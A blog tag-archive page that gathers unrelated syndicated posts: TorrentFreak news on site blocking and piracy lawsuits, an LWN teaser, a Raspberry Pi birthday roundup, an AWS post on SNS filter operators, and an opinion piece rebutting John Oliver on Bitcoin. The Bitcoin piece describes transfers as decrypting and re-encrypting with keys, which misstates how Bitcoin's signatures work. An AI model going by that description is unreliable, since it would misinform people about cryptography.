Tag Archives: LTE

Canadian Pirate Site Blocking Plan Triggers Thousands of Responses

Post Syndicated from Ernesto original https://torrentfreak.com/canadian-pirate-site-blocking-plan-triggers-thousands-of-responses-180317/

In January, a coalition of Canadian companies called on the country’s telecom regulator CRTC to establish a local pirate site blocking program, which would be the first of its kind in North America.

The Canadian deal is supported by Fairplay Canada, a coalition of both copyright holders and major players in the telco industry, such as Bell and Rogers, which also have media companies of their own.

Before making a decision on the proposal, the CTRC has launched a public consultation asking Canadians for their opinion on the matter. In recent weeks this has resulted in thousands of submissions, with the majority coming from ordinary citizens.

The responses themselves range from an unequivocal “another push by Bell to control all forms of communication,” to very elaborate and rather well-documented arguments.

From the responses we’ve seen it’s clear that many individuals are worried that their Internet access will be censored. The term “slippery slope” is regularly mentioned, as well as the corporate interests that back the plan.

“I strongly oppose any attempt for internet censorship, especially any attempt brought forth by a commercial entity. The internet is and should remain a free flowing source of information that is not controlled by any individuals or groups political or corporate interests,” Shanon Durst writes in her comment.

“If there is concern for illegal activities taking place on the internet then those activities can be addressed in a court of law and the appropriate actions taken there,” she adds.

The same type of arguments also come back in the Electronic Frontier Foundation’s (EFF) submission.

“It is unsurprising that the entertainment industry would rather construct its own private body to bypass the court system in making decisions about website blocking,” the EFF writes.

“But if it is allowed to do this, will the newspaper industry be next to propose and fund a private body to make determinations about defamation? Will the adult entertainment industry propose establishing its own private court to determine the boundaries of the law of obscenity?”

While they appear to be in the minority, there are several commenters who back the proposal. Where most individual responses oppose the plans, it appears that many submissions from organizations are in favor.

A lot of these responses come from outfits that are concerned that piracy is negatively impacting their livelihoods, including Canada Basketball, The Association of Canadian Publishers, and Pier 21 Films.

“Canada’s current tools to combat piracy are not working. The FairPlay proposal is a proportionate response that reflects the modern realities of piracy,” Laszlo Barna, president of Pier 21 Films writes.

“As participants in the legal sports and entertainment market in Canada, this proposal will reduce the theft of content and support the ability to invest in, produce, and distribute the great content that our fans crave,” Canada Basketball concurs.

Drawing conclusions based on this limited sample of comments is hard, aside from the finding that it will be impossible to please everyone. Thankfully, research conducted by Reza Rajabiun and Fenwick McKelvey, with support from the Social Sciences and Humanities Research Council of Canada, provides additional insight.

The visualization below gives an overview of the most statistically significant concepts emphasized by respondents in their submissions, as well as the relationship among these concepts.

A visualization of significant comment concepts (image credit)

The quantitative content analysis is based on 4,000 submissions. While it requires some interpretation from the reader, many of the themes appear to be closely aligned with the opposition, the researchers write.

“According to their CRTC submissions, Canadians believe that the proposal is a ‘bad’ ‘idea’ because it enables ‘corporations’ and the ‘government’ to restrict ‘freedom’ of ‘speech’ and ‘flow’ of ‘information’ among ‘citizens.’ The fear of setting a bad ‘precedent’ is closely associated with the potential for ‘censorship’ in the future.”

Many of the same words can also be in a different context, of course, but the researchers see the themes as evidence that many members of the public are concerned about the negative consequences.

“Overall, it is easy to see that Canadians tend to view the proposed blocking regime not just in terms of its benefits for fighting ‘piracy’; they also perceive that setting up a national blocking regime may be a threat to their economic interests as ‘consumers’ of ‘legitimate’ ‘media’ and of their political ‘rights’ as ‘citizens’,” they write.

At the time of writing nearly 8,000 responses have been submitted. There is no easy way to determine what percentage is for or against the proposal. When the deadline passes on March 29, CRTC will review them manually.

When that’s done, it is up to the telecoms regulator to factor the different opinions into its final decision, which won’t be an easy feat.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

Vodafone Appeals Decision Forcing it to Block Pirate Streaming Site Kinox

Post Syndicated from Andy original https://torrentfreak.com/vodafone-appeals-decision-forcing-it-to-block-pirate-streaming-site-kinox-180317/

Streaming site Kinox has proven hugely problematic for German authorities and international rightsholders for many years.

Last year, following a three-year manhunt, one of the site’s alleged operators was detained in Kosovo. Despite this and other actions, the site remains online.

Given the profile of the platform and its popularity in Germany, it came as no surprise when Kinox became the guinea pig for site-blocking in the country. Last month following a complaint from local film production and distribution company Constantin Film, a district court in Munich handed down a provisional injunction against Internet provider Vodafone.

In common with many similar cases across the EU, the Court cited a 2017 ruling from the European Court of Justice which found that local authorities can indeed order blockades of copyright-infringing sites. The Court ordered Vodafone to prevent its subscribers from accessing the site and shortly after the provider complied, but not willingly it seems.

According to local news outlet Golem, last week Vodafone filed an appeal arguing that there is no legal basis in Germany for ordering the blockade.

“As an access provider, Vodafone provides only neutral access to the Internet, and we believe that under current law, Vodafone cannot be required to curb copyright infringement on the Internet,” a Vodafone spokesperson told the publication.

The ISP says that not only does the blocking injunction impact its business operations and network infrastructure, it also violates the rights of its customers. Vodafone believes that blocking measures can only be put in place with an explicit legal basis and argues that no such basis exists under German law.

Noting that blockades are easily bypassed by determined users, the ISP says that such measures can also block lots of legal content, making the whole process ineffective.

“[I]nternet blocking generally runs the risk of blocking non-infringing content, so we do not see it as an effective way to make accessing illegal offers more difficult,” Vodafone’s spokesperson said.

Indeed, it appears that the Kinox blockade is a simple DNS-only effort, which means that people can bypass it by simply changing to an alternative DNS provider such as Google DNS or OpenDNS.

Given all of the above, Vodafone is demanding clarification of the earlier decision from a higher court. Whether or not the final decision will go in the ISP’s favor isn’t clear but there is plenty of case law at the European level that suggests the balance of probabilities lies with Constantin Film.

When asked to balance consumer rights versus copyrights, courts have tended to side with the latter in recent years.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

MPAA Brands 123Movies as the World’s Most Popular Illegal Site

Post Syndicated from Ernesto original https://torrentfreak.com/mpaa-brands-123movies-as-the-worlds-most-popular-illegal-site-180316/

With millions of visitors per day, pirate streaming site 123movies, also known as GoMovies, is a force to be reckoned with.

The Motion Picture Association of America (MPAA) is fully aware of this and previously alerted the US Trade Representative about this “notorious market.”

However, since the site is not operating from the US, Hollywood’s industry group is also reaching out to 123movies’ alleged home turf, Vietnam. Following in the footsteps of the US ambassador, the MPAA seeks assistance from local authorities.

The MPAA is currently in Vietnam where it’s working with the Office of the Police Investigation Agency to combat pirate sites. According to the MPAA’s Executive Vice President & Chief of Global Content Protection, Jan van Voorn, 123movies is one of the prime targets.

“Right now, the most popular illegal site in the world, 123movies.to (at this point), is operated from Vietnam, and has 98 million visitors a month,” Van Voorn said, quoted by VNExpress.

“There are more services like this – sites that are not helpful for local legitimate businesses,” he adds.

The MPAA hopes that the Vietnamese authorities will step in to take these pirate sites offline, so that legal alternatives can grow. In addition, it stresses that the public should be properly educated, to change their views on movie piracy.

While it’s clear that 123movies is a threat to Hollywood, there are bigger fish out there.

The 98 million number MPAA mentions appears to come from SimilarWeb’s January estimate. While this is a lot of traffic indeed, it’s not the largest pirate site. The Pirate Bay, for example, had an estimated 282 million visitors during the same period.

TorrentFreak asked the MPAA to confirm the claim but at the time of writing, we have yet to hear back. Perhaps Van Voorn was referring to streaming sites specifically, which would make more sense.

In any case, it’s clear that Hollywood is concerned about 123movies and similar sites and will do everything in its power to get them offline.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

[$] Designing ELF modules

Post Syndicated from corbet original https://lwn.net/Articles/749108/rss

The bpfilter proposal posted in February
included a new type of kernel module that would run as a user-space
program; its purpose is to parse and translate iptables rules under the
kernel’s control but in a contained, non-kernel setting. These “ELF
modules” were reposted for review as a standalone
patch set in early March. That review has happened; it is a
good example of how community involvement can improve a special-purpose
patch and turn it into a more generally useful feature.

Playboy Wants to Know Who Downloaded Their Playmate Images From Imgur

Post Syndicated from Ernesto original https://torrentfreak.com/playboy-wants-know-downloaded-pirated-playmates-imgur-180313/

Late last year Playboy filed a copyright lawsuit against the popular blog Boing Boing.

The site had previously published an article linking to an archive of Playboy centerfold images, which the adult magazine saw as problematic.

Boing Boing’s parent company Happy Mutants was accused of various counts of copyright infringement, with Playboy claiming that it exploited their playmates’ images for commercial purposes.

The California district court was not convinced, however. In an order last month, Judge Fernando Olguin noted that it is not sufficient to argue that Boing Boing merely ‘provided the means’ to carry out copyright-infringing activity. There also has to be a personal action that ‘assists’ the infringing activity.

“For example, the court is skeptical that plaintiff has sufficiently alleged facts to support either its inducement or material contribution theories of copyright infringement,” Judge Olguin wrote.

Playboy was given the option to file a new complaint before the end of February, or else the case would be dismissed. The magazine publisher decided to let the matter go, for now, and didn’t file a new complaint.

That doesn’t mean that they’ll completely pass on the issue though. Instead of only going after Boing Boing, Playboy is now digging up information on the people who posted the infringing content on Imgur and YouTube.

Last week the California Court asked why PlayBoy hadn’t responded after the latest order. The company replied that it thought no response was needed and that the case would be dismissed automatically, but it included another interesting note.

“Plaintiff has elected to pursue third party subpoenas under, inter alia, the Digital Millennium Copyright Act Section 512(h) in order to obtain further facts before determining how to proceed on its claims against Happy Mutants,” Playboy writes.

Looking through the court dockets, we observed that Playboy requested DMCA subpoenas against both Imgur and YouTube. In both cases, the company demands information that can identify the uploaders, including email addresses, phone numbers, and other documents or information.

With Imgur, it goes even further. Here, Playboy also requests information on people “who downloaded any photos” from the Imgur gallery in question. That could be quite a long list as anyone would have to download the images in order to see them. This could include millions of people.

Playboy subpoena against Imgur

A broad request like this goes further than we’ve ever seen. However, soon after the requests came in, the clerk granted both subpoenas.

At this point, it’s unclear whether Playboy also intends to go after the uploaders directly. It informed the California District Court that these “further facts” will help to determine whether it will pursue its claims against Boing Boing, which means that it must file a new complaint.

It’s worth mentioning, however, that the subpoenas were obtained early last month before the case was dismissed.

Alternatively, Playboy can pursue the Imgur and YouTube uploaders directly, which is more likely to succeed than the infringement claims against Boing Boing. That’s only an option if Imgur and YouTube have sufficient information to identify the infringers in question, of course.

The allegedly infringing centerfold video is no longer listed on YouTube. The Imgur gallery, which was viewed more than two million times, is no longer available either.


Playboy’s latest filing mentioning the DMCA subpoenas can be found here (pdf). We also obtained copies of the Youtube (pdf + attachment) and Imgur (pdf + attachment) subpoenas themselves.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons

Raspberry Jam Big Birthday Weekend 2018 roundup

Post Syndicated from Ben Nuttall original https://www.raspberrypi.org/blog/big-birthday-weekend-2018-roundup/

A couple of weekends ago, we celebrated our sixth birthday by coordinating more than 100 simultaneous Raspberry Jam events around the world. The Big Birthday Weekend was a huge success: our fantastic community organised Jams in 40 countries, covering six continents!

We sent the Jams special birthday kits to help them celebrate in style, and a video message featuring a thank you from Philip and Eben:

Raspberry Jam Big Birthday Weekend 2018

To celebrate the Raspberry Pi’s sixth birthday, we coordinated Raspberry Jams all over the world to take place over the Raspberry Jam Big Birthday Weekend, 3-4 March 2018. A massive thank you to everyone who ran an event and attended.

The Raspberry Jam photo booth

I put together code for a Pi-powered photo booth which overlaid the Big Birthday Weekend logo onto photos and (optionally) tweeted them. We included an arcade button in the Jam kits so they could build one — and it seemed to be quite popular. Some Jams put great effort into housing their photo booth:

Here are some of my favourite photo booth tweets:

RGVSA on Twitter

PiParty photo booth @RGVSA & @ @Nerdvana_io #Rjam

Denis Stretton on Twitter

The @SouthendRPIJams #PiParty photo booth

rpijamtokyo on Twitter

PiParty photo booth

Preston Raspberry Jam on Twitter

Preston Raspberry Jam Photobooth #RJam #PiParty

If you want to try out the photo booth software yourself, find the code on GitHub.

The great Raspberry Jam bake-off

Traditionally, in the UK, people have a cake on their birthday. And we had a few! We saw (and tasted) a great selection of Pi-themed cakes and other baked goods throughout the weekend:

Raspberry Jams everywhere

We always say that every Jam is different, but there’s a common and recognisable theme amongst them. It was great to see so many different venues around the world filling up with like-minded Pi enthusiasts, Raspberry Jam–branded banners, and Raspberry Pi balloons!


Sergio Martinez on Twitter

Thank you so much to all the attendees of the Ikana Jam in Krakow past Saturday! We shared fun experiences, some of them… also painful 😉 A big thank you to @Raspberry_Pi for these global celebrations! And a big thank you to @hubraum for their hospitality! #PiParty #rjam

NI Raspberry Jam on Twitter

We also had a super successful set of wearables workshops using @adafruit Circuit Playground Express boards and conductive thread at today’s @Raspberry_Pi Jam! Very popular! #PiParty

Suzystar on Twitter

My SenseHAT workshop, going well! @SouthendRPiJams #PiParty

Worksop College Raspberry Jam on Twitter

Learning how to scare the zombies in case of an apocalypse- it worked on our young learners #PiParty @worksopcollege @Raspberry_Pi https://t.co/pntEm57TJl


Rita on Twitter

Being one of the two places in Kenya where the #PiParty took place, it was an amazing time spending the day with this team and getting to learn and have fun. @TaitaTavetaUni and @Raspberry_Pi thank you for your support. @TTUTechlady @mictecttu ch




@GABONIAVERACITY #PiParty Lagos Raspberry Jam 2018 Special International Celebration – 6th Raspberry-Pi Big Birthday! Lagos Nigeria @Raspberry_Pi @ben_nuttall #RJam #RaspberryJam #raspberrypi #physicalcomputing #robotics #edtech #coding #programming #edTechAfrica #veracityhouse https://t.co/V7yLxaYGNx

North America

Heidi Baynes on Twitter

The Riverside Raspberry Jam @Vocademy is underway! #piparty

Brad Derstine on Twitter

The Philly & Pi #PiParty event with @Bresslergroup and @TechGirlzorg was awesome! The Scratch and Pi workshop was amazing! It was overall a great day of fun and tech!!! Thank you everyone who came out!

Houston Raspi on Twitter

Thanks everyone who came out to the @Raspberry_Pi Big Birthday Jam! Special thanks to @PBFerrell @estefanniegg @pcsforme @pandafulmanda @colnels @bquentin3 couldn’t’ve put on this amazing community event without you guys!

Merge Robotics 2706 on Twitter

We are back at @SciTechMuseum for the second day of @OttawaPiJam! Our robot Mergius loves playing catch with the kids! #pijam #piparty #omgrobots

South America

Javier Garzón on Twitter

Así terminamos el #Raspberry Jam Big Birthday Weekend #Bogota 2018 #PiParty de #RaspberryJamBogota 2018 @Raspberry_Pi Nos vemos el 7 de marzo en #ArduinoDayBogota 2018 y #RaspberryJamBogota 2018


Fablab UP Cebu on Twitter

Happy 6th birthday, @Raspberry_Pi! Greetings all the way from CEBU,PH! #PiParty #IoTCebu Thanks @CebuXGeeks X Ramos for these awesome pics. #Fablab #UPCebu

福野泰介 on Twitter

ラズパイ、6才のお誕生日会スタート in Tokyo PCNブースで、いろいろ展示とhttps://t.co/L6E7KgyNHFとIchigoJamつないだ、こどもIoTハッカソンmini体験やってます at 東京蒲田駅近 https://t.co/yHEuqXHvqe #piparty #pipartytokyo #rjam #opendataday

Ren Camp on Twitter

Happy birthday @Raspberry_Pi! #piparty #iotcebu @coolnumber9 https://t.co/2ESVjfRJ2d


Glenunga Raspberry Pi Club on Twitter

PiParty photo booth

Personally, I managed to get to three Jams over the weekend: two run by the same people who put on the first two Jams to ever take place, and also one brand-new one! The Preston Raspberry Jam team, who usually run their event on a Monday evening, wanted to do something extra special for the birthday, so they came up with the idea of putting on a Raspberry Jam Sandwich — on the Friday and Monday around the weekend! This meant I was able to visit them on Friday, then attend the Manchester Raspberry Jam on Saturday, and finally drop by the new Jam at Worksop College on my way home on Sunday.

Ben Nuttall on Twitter

I’m at my first Raspberry Jam #PiParty event of the big birthday weekend! @PrestonRJam has been running for nearly 6 years and is a great place to start the celebrations!

Ben Nuttall on Twitter

Back at @McrRaspJam at @DigInnMMU for #PiParty

Ben Nuttall on Twitter

Great to see mine & @Frans_facts Balloon Pi-Tay popper project in action at @worksopjam #rjam #PiParty https://t.co/GswFm0UuPg

Various members of the Foundation team attended Jams around the UK and US, and James from the Code Club International team visited AmsterJam.

hackerfemo on Twitter

Thanks to everyone who came to our Jam and everyone who helped out. @phoenixtogether thanks for amazing cake & hosting. Ademir you’re so cool. It was awesome to meet Craig Morley from @Raspberry_Pi too. #PiParty

Stuart Fox on Twitter

Great #PiParty today at the @cotswoldjam with bloody delicious cake and lots of raspberry goodness. Great to see @ClareSutcliffe @martinohanlon playing on my new pi powered arcade build:-)

Clare Sutcliffe on Twitter

Happy 6th Birthday @Raspberry_Pi from everyone at the #PiParty at #cotswoldjam in Cheltenham!

Code Club on Twitter

It’s @Raspberry_Pi 6th birthday and we’re celebrating by taking part in @amsterjam__! Happy Birthday Raspberry Pi, we’re so happy to be a part of the family! #PiParty

For more Jammy birthday goodness, check out the PiParty hashtag on Twitter!

The Jam makers!

A lot of preparation went into each Jam, and we really appreciate all the hard work the Jam makers put in to making these events happen, on the Big Birthday Weekend and all year round. Thanks also to all the teams that sent us a group photo:

Lots of the Jams that took place were brand-new events, so we hope to see them continue throughout 2018 and beyond, growing the Raspberry Pi community around the world and giving more people, particularly youths, the opportunity to learn digital making skills.

Philip Colligan on Twitter

So many wonderful people in the @Raspberry_Pi community. Thanks to everyone at #PottonPiAndPints for a great afternoon and for everything you do to help young people learn digital making. #PiParty

Special thanks to ModMyPi for shipping the special Raspberry Jam kits all over the world!

Don’t forget to check out our Jam page to find an event near you! This is also where you can find free resources to help you get a new Jam started, and download free starter projects made especially for Jam activities. These projects are available in English, Français, Français Canadien, Nederlands, Deutsch, Italiano, and 日本語. If you’d like to help us translate more content into these and other languages, please get in touch!

PS Some of the UK Jams were postponed due to heavy snowfall, so you may find there’s a belated sixth-birthday Jam coming up where you live!

S Organ on Twitter

@TheMagP1 Ours was rescheduled until later in the Spring due to the snow but here is Babbage enjoying the snow!

The post Raspberry Jam Big Birthday Weekend 2018 roundup appeared first on Raspberry Pi.

Message Filtering Operators for Numeric Matching, Prefix Matching, and Blacklisting in Amazon SNS

Post Syndicated from Christie Gifrin original https://aws.amazon.com/blogs/compute/message-filtering-operators-for-numeric-matching-prefix-matching-and-blacklisting-in-amazon-sns/

This blog was contributed by Otavio Ferreira, Software Development Manager for Amazon SNS

Message filtering simplifies the overall pub/sub messaging architecture by offloading message filtering logic from subscribers, as well as message routing logic from publishers. The initial launch of message filtering provided a basic operator that was based on exact string comparison. For more information, see Simplify Your Pub/Sub Messaging with Amazon SNS Message Filtering.

Today, AWS is announcing an additional set of filtering operators that bring even more power and flexibility to your pub/sub messaging use cases.

Message filtering operators

Amazon SNS now supports both numeric and string matching. Specifically, string matching operators allow for exact, prefix, and “anything-but” comparisons, while numeric matching operators allow for exact and range comparisons, as outlined below. Numeric matching operators work for values between -10e9 and +10e9 inclusive, with five digits of accuracy right of the decimal point.

  • Exact matching on string values (Whitelisting): Subscription filter policy   {"sport": ["rugby"]} matches message attribute {"sport": "rugby"} only.
  • Anything-but matching on string values (Blacklisting): Subscription filter policy {"sport": [{"anything-but": "rugby"}]} matches message attributes such as {"sport": "baseball"} and {"sport": "basketball"} and {"sport": "football"} but not {"sport": "rugby"}
  • Prefix matching on string values: Subscription filter policy {"sport": [{"prefix": "bas"}]} matches message attributes such as {"sport": "baseball"} and {"sport": "basketball"}
  • Exact matching on numeric values: Subscription filter policy {"balance": [{"numeric": ["=", 301.5]}]} matches message attributes {"balance": 301.500} and {"balance": 3.015e2}
  • Range matching on numeric values: Subscription filter policy {"balance": [{"numeric": ["<", 0]}]} matches negative numbers only, and {"balance": [{"numeric": [">", 0, "<=", 150]}]} matches any positive number up to 150.

As usual, you may apply the “AND” logic by appending multiple keys in the subscription filter policy, and the “OR” logic by appending multiple values for the same key, as follows:

  • AND logic: Subscription filter policy {"sport": ["rugby"], "language": ["English"]} matches only messages that carry both attributes {"sport": "rugby"} and {"language": "English"}
  • OR logic: Subscription filter policy {"sport": ["rugby", "football"]} matches messages that carry either the attribute {"sport": "rugby"} or {"sport": "football"}

Message filtering operators in action

Here’s how this new set of filtering operators works. The following example is based on a pharmaceutical company that develops, produces, and markets a variety of prescription drugs, with research labs located in Asia Pacific and Europe. The company built an internal procurement system to manage the purchasing of lab supplies (for example, chemicals and utensils), office supplies (for example, paper, folders, and markers) and tech supplies (for example, laptops, monitors, and printers) from global suppliers.

This distributed system is composed of the four following subsystems:

  • A requisition system that presents the catalog of products from suppliers, and takes orders from buyers
  • An approval system for orders targeted to Asia Pacific labs
  • Another approval system for orders targeted to European labs
  • A fulfillment system that integrates with shipping partners

As shown in the following diagram, the company leverages AWS messaging services to integrate these distributed systems.

  • Firstly, an SNS topic named “Orders” was created to take all orders placed by buyers on the requisition system.
  • Secondly, two Amazon SQS queues, named “Lab-Orders-AP” and “Lab-Orders-EU” (for Asia Pacific and Europe respectively), were created to backlog orders that are up for review on the approval systems.
  • Lastly, an SQS queue named “Common-Orders” was created to backlog orders that aren’t related to lab supplies, which can already be picked up by shipping partners on the fulfillment system.

The company also uses AWS Lambda functions to automatically process lab supply orders that don’t require approval or which are invalid.

In this example, because different types of orders have been published to the SNS topic, the subscribing endpoints have had to set advanced filter policies on their SNS subscriptions, to have SNS automatically filter out orders they can’t deal with.

As depicted in the above diagram, the following five filter policies have been created:

  • The SNS subscription that points to the SQS queue “Lab-Orders-AP” sets a filter policy that matches lab supply orders, with a total value greater than $1,000, and that target Asia Pacific labs only. These more expensive transactions require an approver to review orders placed by buyers.
  • The SNS subscription that points to the SQS queue “Lab-Orders-EU” sets a filter policy that matches lab supply orders, also with a total value greater than $1,000, but that target European labs instead.
  • The SNS subscription that points to the Lambda function “Lab-Preapproved” sets a filter policy that only matches lab supply orders that aren’t as expensive, up to $1,000, regardless of their target lab location. These orders simply don’t require approval and can be automatically processed.
  • The SNS subscription that points to the Lambda function “Lab-Cancelled” sets a filter policy that only matches lab supply orders with total value of $0 (zero), regardless of their target lab location. These orders carry no actual items, obviously need neither approval nor fulfillment, and as such can be automatically canceled.
  • The SNS subscription that points to the SQS queue “Common-Orders” sets a filter policy that blacklists lab supply orders. Hence, this policy matches only office and tech supply orders, which have a more streamlined fulfillment process, and require no approval, regardless of price or target location.

After the company finished building this advanced pub/sub architecture, they were then able to launch their internal procurement system and allow buyers to begin placing orders. The diagram above shows six example orders published to the SNS topic. Each order contains message attributes that describe the order, and cause them to be filtered in a different manner, as follows:

  • Message #1 is a lab supply order, with a total value of $15,700 and targeting a research lab in Singapore. Because the value is greater than $1,000, and the location “Asia-Pacific-Southeast” matches the prefix “Asia-Pacific-“, this message matches the first SNS subscription and is delivered to SQS queue “Lab-Orders-AP”.
  • Message #2 is a lab supply order, with a total value of $1,833 and targeting a research lab in Ireland. Because the value is greater than $1,000, and the location “Europe-West” matches the prefix “Europe-“, this message matches the second SNS subscription and is delivered to SQS queue “Lab-Orders-EU”.
  • Message #3 is a lab supply order, with a total value of $415. Because the value is greater than $0 and less than $1,000, this message matches the third SNS subscription and is delivered to Lambda function “Lab-Preapproved”.
  • Message #4 is a lab supply order, but with a total value of $0. Therefore, it only matches the fourth SNS subscription, and is delivered to Lambda function “Lab-Cancelled”.
  • Messages #5 and #6 aren’t lab supply orders actually; one is an office supply order, and the other is a tech supply order. Therefore, they only match the fifth SNS subscription, and are both delivered to SQS queue “Common-Orders”.

Although each message only matched a single subscription, each was tested against the filter policy of every subscription in the topic. Hence, depending on which attributes are set on the incoming message, the message might actually match multiple subscriptions, and multiple deliveries will take place. Also, it is important to bear in mind that subscriptions with no filter policies catch every single message published to the topic, as a blank filter policy equates to a catch-all behavior.


Amazon SNS allows for both string and numeric filtering operators. As explained in this post, string operators allow for exact, prefix, and “anything-but” comparisons, while numeric operators allow for exact and range comparisons. These advanced filtering operators bring even more power and flexibility to your pub/sub messaging functionality and also allow you to simplify your architecture further by removing even more logic from your subscribers.

Message filtering can be implemented easily with existing AWS SDKs by applying message and subscription attributes across all SNS supported protocols (Amazon SQS, AWS Lambda, HTTP, SMS, email, and mobile push). SNS filtering operators for numeric matching, prefix matching, and blacklisting are available now in all AWS Regions, for no extra charge.

To experiment with these new filtering operators yourself, and continue learning, try the 10-minute Tutorial Filter Messages Published to Topics. For more information, see Filtering Messages with Amazon SNS in the SNS documentation.

What John Oliver gets wrong about Bitcoin

Post Syndicated from Robert Graham original http://blog.erratasec.com/2018/03/what-john-oliver-gets-wrong-about.html

John Oliver covered bitcoin/cryptocurrencies last night. I thought I’d describe a bunch of things he gets wrong.

How Bitcoin works

Nowhere in the show does it describe what Bitcoin is and how it works.
Discussions should always start with Satoshi Nakamoto’s original paper. The thing Satoshi points out is that there is an important cost to normal transactions, namely, the entire legal system designed to protect you against fraud, such as the way you can reverse the transactions on your credit card if it gets stolen. The point of Bitcoin is that there is no way to reverse a charge. A transaction is done via cryptography: to transfer money to me, you decrypt it with your secret key and encrypt it with mine, handing ownership over to me with no third party involved that can reverse the transaction, and essentially no overhead.
All the rest of the stuff, like the decentralized blockchain and mining, is all about making that work.
Bitcoin crazies forget about the original genesis of Bitcoin. For example, they talk about adding features to stop fraud, reversing transactions, and having a central authority that manages that. This misses the point, because the existing electronic banking system already does that, and does a better job at it than cryptocurrencies ever can. If you want to mock cryptocurrencies, talk about the “DAO”, which did exactly that — and collapsed in a big fraudulent scheme where insiders made money and outsiders didn’t.
Sticking to Satoshi’s original ideas are a lot better than trying to repeat how the crazy fringe activists define Bitcoin.

How does any money have value?

Oliver’s answer is currencies have value because people agree that they have value, like how they agree a Beanie Baby is worth $15,000.
This is wrong. A better way of asking the question why the value of money changes. The dollar has been losing roughly 2% of its value each year for decades. This is called “inflation”, as the dollar loses value, it takes more dollars to buy things, which means the price of things (in dollars) goes up, and employers have to pay us more dollars so that we can buy the same amount of things.
The reason the value of the dollar changes is largely because the Federal Reserve manages the supply of dollars, using the same law of Supply and Demand. As you know, if a supply decreases (like oil), then the price goes up, or if the supply of something increases, the price goes down. The Fed manages money the same way: when prices rise (the dollar is worth less), the Fed reduces the supply of dollars, causing it to be worth more. Conversely, if prices fall (or don’t rise fast enough), the Fed increases supply, so that the dollar is worth less.
The reason money follows the law of Supply and Demand is because people use money, they consume it like they do other goods and services, like gasoline, tax preparation, food, dance lessons, and so forth. It’s not like a fine art painting, a stamp collection or a Beanie Baby — money is a product. It’s just that people have a hard time thinking of it as a consumer product since, in their experience, money is what they use to buy consumer products. But it’s a symmetric operation: when you buy gasoline with dollars, you are actually selling dollars in exchange for gasoline. That you call one side in this transaction “money” and the other “goods” is purely arbitrary, you call gasoline money and dollars the good that is being bought and sold for gasoline.
The reason dollars is a product is because trying to use gasoline as money is a pain in the neck. Storing it and exchanging it is difficult. Goods like this do become money, such as famously how prisons often use cigarettes as a medium of exchange, even for non-smokers, but it has to be a good that is fungible, storable, and easily exchanged. Dollars are the most fungible, the most storable, and the easiest exchanged, so has the most value as “money”. Sure, the mechanic can fix the farmers car for three chickens instead, but most of the time, both parties in the transaction would rather exchange the same value using dollars than chickens.
So the value of dollars is not like the value of Beanie Babies, which people might buy for $15,000, which changes purely on the whims of investors. Instead, a dollar is like gasoline, which obey the law of Supply and Demand.
This brings us back to the question of where Bitcoin gets its value. While Bitcoin is indeed used like dollars to buy things, that’s only a tiny use of the currency, so therefore it’s value isn’t determined by Supply and Demand. Instead, the value of Bitcoin is a lot like Beanie Babies, obeying the laws of investments. So in this respect, Oliver is right about where the value of Bitcoin comes, but wrong about where the value of dollars comes from.

Why Bitcoin conference didn’t take Bitcoin

John Oliver points out the irony of a Bitcoin conference that stopped accepting payments in Bitcoin for tickets.
The biggest reason for this is because Bitcoin has become so popular that transaction fees have gone up. Instead of being proof of failure, it’s proof of popularity. What John Oliver is saying is the old joke that nobody goes to that popular restaurant anymore because it’s too crowded and you can’t get a reservation.
Moreover, the point of Bitcoin is not to replace everyday currencies for everyday transactions. If you read Satoshi Nakamoto’s whitepaper, it’s only goal is to replace certain types of transactions, like purely electronic transactions where electronic goods and services are being exchanged. Where real-life goods/services are being exchanged, existing currencies work just fine. It’s only the crazy activists who claim Bitcoin will eventually replace real world currencies — the saner people see it co-existing with real-world currencies, each with a different value to consumers.

Turning a McNugget back into a chicken

John Oliver uses the metaphor of turning a that while you can process a chicken into McNuggets, you can’t reverse the process. It’s a funny metaphor.
But it’s not clear what the heck this metaphor is trying explain. That’s not a metaphor for the blockchain, but a metaphor for a “cryptographic hash”, where each block is a chicken, and the McNugget is the signature for the block (well, the block plus the signature of the last block, forming a chain).
Even then that metaphor as problems. The McNugget produced from each chicken must be unique to that chicken, for the metaphor to accurately describe a cryptographic hash. You can therefore identify the original chicken simply by looking at the McNugget. A slight change in the original chicken, like losing a feather, results in a completely different McNugget. Thus, nuggets can be used to tell if the original chicken has changed.
This then leads to the key property of the blockchain, it is unalterable. You can’t go back and change any of the blocks of data, because the fingerprints, the nuggets, will also change, and break the nugget chain.
The point is that while John Oliver is laughing at a silly metaphor to explain the blockchain becuase he totally misses the point of the metaphor.
Oliver rightly says “don’t worry if you don’t understand it — most people don’t”, but that includes the big companies that John Oliver name. Some companies do get it, and are producing reasonable things (like JP Morgan, by all accounts), but some don’t. IBM and other big consultancies are charging companies millions of dollars to consult with them on block chain products where nobody involved, the customer or the consultancy, actually understand any of it. That doesn’t stop them from happily charging customers on one side and happily spending money on the other.
Thus, rather than Oliver explaining the problem, he’s just being part of the problem. His explanation of blockchain left you dumber than before.


John Oliver mocks the Brave ICO ($35 million in 30 seconds), claiming it’s all driven by YouTube personalities and people who aren’t looking at the fundamentals.
And while this is true, most ICOs are bunk, the  Brave ICO actually had a business model behind it. Brave is a Chrome-like web-browser whose distinguishing feature is that it protects your privacy from advertisers. If you don’t use Brave or a browser with an ad block extension, you have no idea how bad things are for you. However, this presents a problem for websites that fund themselves via advertisements, which is most of them, because visitors no longer see ads. Brave has a fix for this. Most people wouldn’t mind supporting the websites they visit often, like the New York Times. That’s where the Brave ICO “token” comes in: it’s not simply stock in Brave, but a token for micropayments to websites. Users buy tokens, then use them for micropayments to websites like New York Times. The New York Times then sells the tokens back to the market for dollars. The buying and selling of tokens happens without a centralized middleman.
This is still all speculative, of course, and it remains to be seen how successful Brave will be, but it’s a serious effort. It has well respected VC behind the company, a well-respected founder (despite the fact he invented JavaScript), and well-respected employees. It’s not a scam, it’s a legitimate venture.

How to you make money from Bitcoin?

The last part of the show is dedicated to describing all the scam out there, advising people to be careful, and to be “responsible”. This is garbage.
It’s like my simple two step process to making lots of money via Bitcoin: (1) buy when the price is low, and (2) sell when the price is high. My advice is correct, of course, but useless. Same as “be careful” and “invest responsibly”.
